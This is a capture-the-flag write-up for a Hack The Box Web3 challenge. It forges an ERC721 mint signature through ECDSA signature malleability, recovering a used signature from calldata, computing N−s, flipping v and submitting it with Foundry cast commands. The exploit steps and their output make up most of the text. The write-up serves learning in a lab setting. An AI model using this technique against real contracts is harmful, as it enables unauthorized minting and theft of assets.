HTB Business 2023 : Confidentiality (Web3)
Details :
First of all, the contract relays on a signature check to mint an erc721 token.
After a little bit of researches, we can see the use of ecrecover(hash,v,r,s) which is vulnerable to signature maleability. I did a bit of research and here is what we need to ensure our exploit works correctly.
Goal :
Our goal is to trick the following function :
1
2
3
4
5
6
7
8
|
function safeMintWithSignature(bytes memory signature, address to) external returns (uint256) {
require(_verifySignature(signature), "Not approved");
require(!_isSignatureUsed(signature), "Signature already used");
usedSignatures.push(signature);
return _safeMintInternal(to);
}
|
Requirements :
- One signature already used
- The ECC used (in our case ethereum uses the SECP256k1)
Finding the signature :
Since we need a valid signature, we need to find the signature used by the following setup contract :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
contract Setup {
AccessToken public immutable TARGET;
constructor(address _owner, bytes memory signature) {
TARGET = new AccessToken(_owner);
// Secure 1 AccessToken for myself
TARGET.safeMintWithSignature(signature, address(this));
}
function isSolved(address _player) public view returns (bool) {
return TARGET.balanceOf(_player) > 0;
}
}
|
In order to do this, we can use the following technique :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
klm@KLM:~$ cast block 1 --rpc-url=$RPC
baseFeePerGas 0
difficulty 0
extraData 0x
gasLimit 30000000
gasUsed 1662851
hash 0x9496a5df6bb380de375c842778d3e0495a91c92170b23e889b3d45791b0f48ef
logsBloom 0x20000000000000000000000000000000000004000000000000800000000000000000000000000000000000000000000000000000000000000010000000040000000000000000000000000008000000000001000000040000000000000000000000000000020000000000000000000800000000000000000000000010000200400000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000100000000000000000002000000000000020000000000000000000000000000000080000060000000000000000000000000000000000000000000000000000000000000000000
miner 0x0000000000000000000000000000000000000000
mixHash 0x0000000000000000000000000000000000000000000000000000000000000000
nonce 0x0000000000000000
number 1
parentHash 0xbb4897c994a8632efd9804ee2fd5c2a26310b57a839cf530b34412ebcbd2a963
receiptsRoot 0xed07c147466ee27c86c7601e71032a3a3a0693cfc9fb75d1e84804d972995214
sealFields [
0x0000000000000000000000000000000000000000000000000000000000000000
0x0000000000000000
]
sha3Uncles 0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347
size 8108
stateRoot 0x5bf545d6c93f1a48d04741049866b5f1306d92a95274ba5eaf23c6ed6b65f09f
timestamp 1689507346
totalDifficulty 0
transactions: [
0xd51acc401fafa93f4998db6a8847c98b83d9b004f49dddd340003bb00679421d
]
|
We now have the transaction, now we can use :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
klm@KLM:~$ cast tx 0xd51acc401fafa93f4998db6a8847c98b83d9b004f49dddd340003bb00679421d --rpc-url=$RPC
blockHash 0x9496a5df6bb380de375c842778d3e0495a91c92170b23e889b3d45791b0f48ef
blockNumber 1
from 0x128b803157C977abefbcCcFd8cfdb2d3851cD654
gas 10000000
gasPrice 0
hash 0xd51acc401fafa93f4998db6a8847c98b83d9b004f49dddd340003bb00679421d
input 0x60a060405234801561001057600080fd5b50604051611c96380380611c9683398101604081905261002f9161012c565b8160405161003c906100e5565b6001600160a01b039091168152602001604051809103906000f080158015610068573d6000803e3d6000fd5b506001600160a01b03166080819052604051636d24931160e11b815263da4926229061009a90849030906004016101fa565b6020604051808303816000875af11580156100b9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906100dd919061023e565b505050610257565b6118688061042e83390190565b634e487b7160e01b600052604160045260246000fd5b60005b8381101561012357818101518382015260200161010b565b50506000910152565b6000806040838503121561013f57600080fd5b82516001600160a01b038116811461015657600080fd5b60208401519092506001600160401b038082111561017357600080fd5b818501915085601f83011261018757600080fd5b815181811115610199576101996100f2565b604051601f8201601f19908116603f011681019083821181831017156101c1576101c16100f2565b816040528281528860208487010111156101da57600080fd5b6101eb836020830160208801610108565b80955050505050509250929050565b6040815260008351806040840152610219816060850160208801610108565b6001600160a01b0393909316602083015250601f91909101601f191601606001919050565b60006020828403121561025057600080fd5b5051919050565b6080516101b7610277600039600081816068015260c601526101b76000f3fe608060405234801561001057600080fd5b50600436106100365760003560e01c806354a874b41461003b578063cc1f2afa14610063575b600080fd5b61004e610049366004610138565b6100a2565b60405190151581526020015b60405180910390f35b61008a7f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b03909116815260200161005a565b6040516370a0823160e01b81526001600160a01b03828116600483015260009182917f000000000000000000000000000000000000000000000000000000000000000016906370a0823190602401602060405180830381865afa15801561010d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906101319190610168565b1192915050565b60006020828403121561014a57600080fd5b81356001600160a01b038116811461016157600080fd5b9392505050565b60006020828403121561017a57600080fd5b505191905056fea26469706673582212202ecbc8ac0a292c3ffa71a2a475249339e72000ba2654ba29b7695583131c090f64736f6c6343000813003360806040523480156200001157600080fd5b5060405162001868380380620018688339810160408190526200003491620000eb565b806040518060400160405280600b81526020016a20b1b1b2b9b9aa37b5b2b760a91b815250604051806040016040528060038152602001621050d560ea1b8152508160009081620000869190620001c2565b506001620000958282620001c2565b5050600680546001600160a01b0319166001600160a01b0384169081179091556040519091506000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350506200028e565b600060208284031215620000fe57600080fd5b81516001600160a01b03811681146200011657600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200014857607f821691505b6020821081036200016957634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620001bd57600081815260208120601f850160051c81016020861015620001985750805b601f850160051c820191505b81811015620001b957828155600101620001a4565b5050505b505050565b81516001600160401b03811115620001de57620001de6200011d565b620001f681620001ef845462000133565b846200016f565b602080601f8311600181146200022e5760008415620002155750858301515b600019600386901b1c1916600185901b178555620001b9565b600085815260208120601f198616915b828110156200025f578886015182559484019460019091019084016200023e565b50858210156200027e5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6115ca806200029e6000396000f3fe608060405234801561001057600080fd5b50600436106101375760003560e01c8063771282f6116100b8578063b88d4fde1161007c578063b88d4fde146102d1578063da492622146102e4578063dd885e1c146102f7578063e985e9c51461033d578063f2fde38b1461036b578063fc8e657f1461037e57600080fd5b8063771282f6146102875780638da5cb5b14610290578063927354e9146102a357806395d89b41146102b6578063a22cb465146102be57600080fd5b806323b872dd116100ff57806323b872dd1461021a57806340d097c31461022d57806342842e0e1461024e5780636352211e1461026157806370a082311461027457600080fd5b806301ffc9a71461013c57806306fdde0314610164578063081812fc14610179578063095ea7b3146101ba57806320397462146101cf575b600080fd5b61014f61014a366004610f52565b6103a5565b60405190151581526020015b60405180910390f35b61016c6103f7565b60405161015b9190610fb5565b6101a2610187366004610fc8565b6004602052600090815260409020546001600160a01b031681565b6040516001600160a01b03909116815260200161015b565b6101cd6101c8366004610ff8565b610485565b005b61016c6101dd366004611022565b6040805160208101939093528281019190915260f89290921b6001600160f81b031916606082015281516041818303018152606190910190915290565b6101cd61022836600461105d565b61056c565b61024061023b366004611099565b610733565b60405190815260200161015b565b6101cd61025c36600461105d565b61078d565b6101a261026f366004610fc8565b610862565b610240610282366004611099565b6108b4565b61024060075481565b6006546101a2906001600160a01b031681565b61016c6102b1366004610fc8565b610917565b61016c610942565b6101cd6102cc3660046110b4565b61094f565b6101cd6102df3660046110f0565b6109bb565b6102406102f236600461122e565b610a80565b61031e61030536600461127c565b6020810151604082015160609092015160001a92909190565b6040805160ff909416845260208401929092529082015260600161015b565b61014f61034b3660046112b9565b600560209081526000928352604080842090915290825290205460ff1681565b6101cd610379366004611099565b610b62565b6102407f4ed1c9f7e3813196653ad7c62857a519087860f86aff4bc7766c8af8756a72ba81565b60006301ffc9a760e01b6001600160e01b0319831614806103d657506380ac58cd60e01b6001600160e01b03198316145b806103f15750635b5e139f60e01b6001600160e01b03198316145b92915050565b60008054610404906112e3565b80601f0160208091040260200160405190810160405280929190818152602001828054610430906112e3565b801561047d5780601f106104525761010080835404028352916020019161047d565b820191906000526020600020905b81548152906001019060200180831161046057829003601f168201915b505050505081565b6000818152600260205260409020546001600160a01b0316338114806104ce57506001600160a01b038116600090815260056020908152604080832033845290915290205460ff165b6105105760405162461bcd60e51b815260206004820152600e60248201526d1393d517d055551213d49256915160921b60448201526064015b60405180910390fd5b60008281526004602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b6000818152600260205260409020546001600160a01b038481169116146105c25760405162461bcd60e51b815260206004820152600a60248201526957524f4e475f46524f4d60b01b6044820152606401610507565b6001600160a01b03821661060c5760405162461bcd60e51b81526020600482015260116024820152701253959053125117d49150d25412515395607a1b6044820152606401610507565b336001600160a01b038416148061064657506001600160a01b038316600090815260056020908152604080832033845290915290205460ff165b8061066757506000818152600460205260409020546001600160a01b031633145b6106a45760405162461bcd60e51b815260206004820152600e60248201526d1393d517d055551213d49256915160921b6044820152606401610507565b6001600160a01b0380841660008181526003602090815260408083208054600019019055938616808352848320805460010190558583526002825284832080546001600160a01b03199081168317909155600490925284832080549092169091559251849392917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91a4505050565b6006546000906001600160a01b0316331461077f5760405162461bcd60e51b815260206004820152600c60248201526b15539055551213d49256915160a21b6044820152606401610507565b6103f182610bf7565b919050565b61079883838361056c565b6001600160a01b0382163b15806108415750604051630a85bd0160e11b8082523360048301526001600160a01b03858116602484015260448301849052608060648401526000608484015290919084169063150b7a029060a4016020604051808303816000875af1158015610811573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610835919061131d565b6001600160e01b031916145b61085d5760405162461bcd60e51b81526004016105079061133a565b505050565b6000818152600260205260409020546001600160a01b0316806107885760405162461bcd60e51b815260206004820152600a6024820152691393d517d3525395115160b21b6044820152606401610507565b60006001600160a01b0382166108fb5760405162461bcd60e51b815260206004820152600c60248201526b5a45524f5f4144445245535360a01b6044820152606401610507565b506001600160a01b031660009081526003602052604090205490565b6008818154811061092757600080fd5b906000526020600020016000915090508054610404906112e3565b60018054610404906112e3565b3360008181526005602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b6109c685858561056c565b6001600160a01b0384163b1580610a5d5750604051630a85bd0160e11b808252906001600160a01b0386169063150b7a0290610a0e9033908a90899089908990600401611364565b6020604051808303816000875af1158015610a2d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a51919061131d565b6001600160e01b031916145b610a795760405162461bcd60e51b81526004016105079061133a565b5050505050565b6000610a8b83610c27565b610ac65760405162461bcd60e51b815260206004820152600c60248201526b139bdd08185c1c1c9bdd995960a21b6044820152606401610507565b610acf83610ced565b15610b155760405162461bcd60e51b815260206004820152601660248201527514da59db985d1d5c9948185b1c9958591e481d5cd95960521b6044820152606401610507565b600880546001810182556000919091527ff3f7a9fe364faab93b216da50a3214154f22a0a2b415b23a84c8169e8b636ee301610b518482611406565b50610b5b82610bf7565b9392505050565b6006546001600160a01b03163314610bab5760405162461bcd60e51b815260206004820152600c60248201526b15539055551213d49256915160a21b6044820152606401610507565b600680546001600160a01b0319166001600160a01b03831690811790915560405133907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a350565b6000600160076000828254610c0c91906114dc565b92505081905550610c1f82600754610d5e565b505060075490565b600080600080610c4a856020810151604082015160609092015160001a92909190565b604080516000808252602082018084527f4ed1c9f7e3813196653ad7c62857a519087860f86aff4bc7766c8af8756a72ba905260ff861692820192909252606081018490526080810183905293965091945092509060019060a0016020604051602081039080840390855afa158015610cc7573d6000803e3d6000fd5b5050604051601f1901516006546001600160a01b03918216911614979650505050505050565b6000805b600854811015610d555760088181548110610d0e57610d0e6114ef565b90600052602060002001604051610d259190611505565b6040518091039020838051906020012003610d435750600192915050565b80610d4d8161157b565b915050610cf1565b50600092915050565b610d688282610e2e565b6001600160a01b0382163b1580610e0e5750604051630a85bd0160e11b80825233600483015260006024830181905260448301849052608060648401526084830152906001600160a01b0384169063150b7a029060a4016020604051808303816000875af1158015610dde573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e02919061131d565b6001600160e01b031916145b610e2a5760405162461bcd60e51b81526004016105079061133a565b5050565b6001600160a01b038216610e785760405162461bcd60e51b81526020600482015260116024820152701253959053125117d49150d25412515395607a1b6044820152606401610507565b6000818152600260205260409020546001600160a01b031615610ece5760405162461bcd60e51b815260206004820152600e60248201526d1053149150511657d3525395115160921b6044820152606401610507565b6001600160a01b038216600081815260036020908152604080832080546001019055848352600290915280822080546001600160a01b0319168417905551839291907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a45050565b6001600160e01b031981168114610f4f57600080fd5b50565b600060208284031215610f6457600080fd5b8135610b5b81610f39565b6000815180845260005b81811015610f9557602081850181015186830182015201610f79565b506000602082860101526020601f19601f83011685010191505092915050565b602081526000610b5b6020830184610f6f565b600060208284031215610fda57600080fd5b5035919050565b80356001600160a01b038116811461078857600080fd5b6000806040838503121561100b57600080fd5b61101483610fe1565b946020939093013593505050565b60008060006060848603121561103757600080fd5b833560ff8116811461104857600080fd5b95602085013595506040909401359392505050565b60008060006060848603121561107257600080fd5b61107b84610fe1565b925061108960208501610fe1565b9150604084013590509250925092565b6000602082840312156110ab57600080fd5b610b5b82610fe1565b600080604083850312156110c757600080fd5b6110d083610fe1565b9150602083013580151581146110e557600080fd5b809150509250929050565b60008060008060006080868803121561110857600080fd5b61111186610fe1565b945061111f60208701610fe1565b935060408601359250606086013567ffffffffffffffff8082111561114357600080fd5b818801915088601f83011261115757600080fd5b81358181111561116657600080fd5b89602082850101111561117857600080fd5b9699959850939650602001949392505050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126111b257600080fd5b813567ffffffffffffffff808211156111cd576111cd61118b565b604051601f8301601f19908116603f011681019082821181831017156111f5576111f561118b565b8160405283815286602085880101111561120e57600080fd5b836020870160208301376000602085830101528094505050505092915050565b6000806040838503121561124157600080fd5b823567ffffffffffffffff81111561125857600080fd5b611264858286016111a1565b92505061127360208401610fe1565b90509250929050565b60006020828403121561128e57600080fd5b813567ffffffffffffffff8111156112a557600080fd5b6112b1848285016111a1565b949350505050565b600080604083850312156112cc57600080fd5b6112d583610fe1565b915061127360208401610fe1565b600181811c908216806112f757607f821691505b60208210810361131757634e487b7160e01b600052602260045260246000fd5b50919050565b60006020828403121561132f57600080fd5b8151610b5b81610f39565b60208082526010908201526f155394d0519157d49150d2541251539560821b604082015260600190565b6001600160a01b038681168252851660208201526040810184905260806060820181905281018290526000828460a0840137600060a0848401015260a0601f19601f85011683010190509695505050505050565b601f82111561085d57600081815260208120601f850160051c810160208610156113df5750805b601f850160051c820191505b818110156113fe578281556001016113eb565b505050505050565b815167ffffffffffffffff8111156114205761142061118b565b6114348161142e84546112e3565b846113b8565b602080601f83116001811461146957600084156114515750858301515b600019600386901b1c1916600185901b1785556113fe565b600085815260208120601f198616915b8281101561149857888601518255948401946001909101908401611479565b50858210156114b65787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b808201808211156103f1576103f16114c6565b634e487b7160e01b600052603260045260246000fd5b6000808354611513816112e3565b6001828116801561152b57600181146115405761156f565b60ff198416875282151583028701945061156f565b8760005260208060002060005b858110156115665781548a82015290840190820161154d565b50505082870194505b50929695505050505050565b60006001820161158d5761158d6114c6565b506001019056fea2646970667358221220237ff02db058c29b8d466823f1a12c7580e016ac7a8d35541f1133e9bd883e5064736f6c63430008130033000000000000000000000000403ff7d98b782fe4d824f3a0a702cc4e7ba15b2c00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000041ef2d40632e1eb0c2cc4196643d4b1f90a7e7b50c2933bc7fb134dafecdc084834de6e701ac786271e2d5df8971d6bd0d9278e2c1323ef1efa856ab76b9ce69671c00000000000000000000000000000000000000000000000000000000000000
nonce 0
r 0xad901b3691099f12e7087efa97bebe22a13e8a275f0695517819345e29c5736a
s 0x710d4cf7a959d106d1d02132fb8bcaff1ffe725a489f5907b4e3783895f9b19a
to
transactionIndex 0
v 62710
value 0
|
I struggled a long time before finding the signature was given at the end of the input.
1
|
ef2d40632e1eb0c2cc4196643d4b1f90a7e7b50c2933bc7fb134dafecdc084834de6e701ac786271e2d5df8971d6bd0d9278e2c1323ef1efa856ab76b9ce69671c
|
Exploit !
If we call the deconstructSignature(bytes memory signature)
we have the following parameters :
1
2
3
4
|
klm@KLM:~$ cast call $TAR "deconstructSignature(bytes)(uint8,bytes32,bytes32)" ef2d40632e1eb0c2cc4196643d4b1f90a7e7b50c2933bc7fb134dafecdc084834de6e701ac786271e2d5df8971d6bd0d9278e2c1323ef1efa856ab76b9ce69671c --rpc-url=$RPC
28 (v)
0xef2d40632e1eb0c2cc4196643d4b1f90a7e7b50c2933bc7fb134dafecdc08483 (r)
0x4de6e701ac786271e2d5df8971d6bd0d9278e2c1323ef1efa856ab76b9ce6967 (s)
|
I found on a blog we could use the following trick to exploit :
Use N=number of points on the ECC
do : N-S and change the value of V to 27 or 28 (should be the only one that is not already used)
1
2
3
4
|
>>> 115792089237316195423570985008687907852837564279074904382605163141518161494337 - a
80556030722976362337121034394813014163923285592143567796782767319140425783258
>>> hex(80556030722976362337121034394813014163923285592143567796782767319140425783258)
'0xb21918fe53879d8e1d2a20768e2942f12835fa257d09ae4c177bb3161667d7da'
|
Now we have :
- v = 27 (1b)
- s = 0xb21918fe53879d8e1d2a20768e2942f12835fa257d09ae4c177bb3161667d7da
- r = 0xef2d40632e1eb0c2cc4196643d4b1f90a7e7b50c2933bc7fb134dafecdc08483
We can call the constructSignature(v,r,s)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
klm@KLM:~$ cast call $TAR "constructSignature(uint8,bytes32,bytes32)(bytes)" 27 0xef2d40632e1eb0c2cc4196643d4b1f90a7e7b5
0c2933bc7fb134dafecdc08483 0xb21918fe53879d8e1d2a20768e2942f12835fa257d09ae4c177bb3161667d7da --rpc-url=$RPC
0xef2d40632e1eb0c2cc4196643d4b1f90a7e7b50c2933bc7fb134dafecdc08483b21918fe53879d8e1d2a20768e2942f12835fa257d09ae4c177bb3161667d7da1b
klm@KLM:~$ cast send $TAR "safeMintWithSignature(bytes,address)" 0xef2d40632e1eb0c2cc4196643d4b1f90a7e7b50c2933bc7fb134dafecdc08483b21918fe53879d8e1d2a20768e2942f12835fa257d09ae4c177bb3161667d7da1b $ME --rpc-url=$RPC --private-key=$PK
blockHash 0xc7c5b893ce21ade8c9f29bcc45542f2e6b001b069dd20b8914b4f879c1a5d831
blockNumber 2
contractAddress
cumulativeGasUsed 185202
effectiveGasPrice 3000000000
gasUsed 185202
logs [{"address":"0x2747420aa58446d81ee2604daa1f1774b127882a","topics":["0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef","0x0000000000000000000000000000000000000000000000000000000000000000","0x00000000000000000000000074dbd970351b592a39ddd702d8bc7a71635de282","0x0000000000000000000000000000000000000000000000000000000000000002"],"data":"0x","blockHash":"0xc7c5b893ce21ade8c9f29bcc45542f2e6b001b069dd20b8914b4f879c1a5d831","blockNumber":"0x2","transactionHash":"0x4ea6a71a8c13884067467e091888dad351ea12ebe82742c79f0a5f00854b14d2","transactionIndex":"0x0","logIndex":"0x0","transactionLogIndex":"0x0","removed":false}]
logsBloom 0x04000000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000100000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000020000000000000000000800000000000000000000000010000200000000000000000000000000000000000000000000000000000000000000000000000000000000000020000100000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000080000020000000000000000000000000000000000000000000008000000000000000040000
root
status 1
transactionHash 0x4ea6a71a8c13884067467e091888dad351ea12ebe82742c79f0a5f00854b14d2
transactionIndex 0
type 2
|
Now enjoy !
HTB{XXXXXXXXXXXXXXXXXXXXXX}
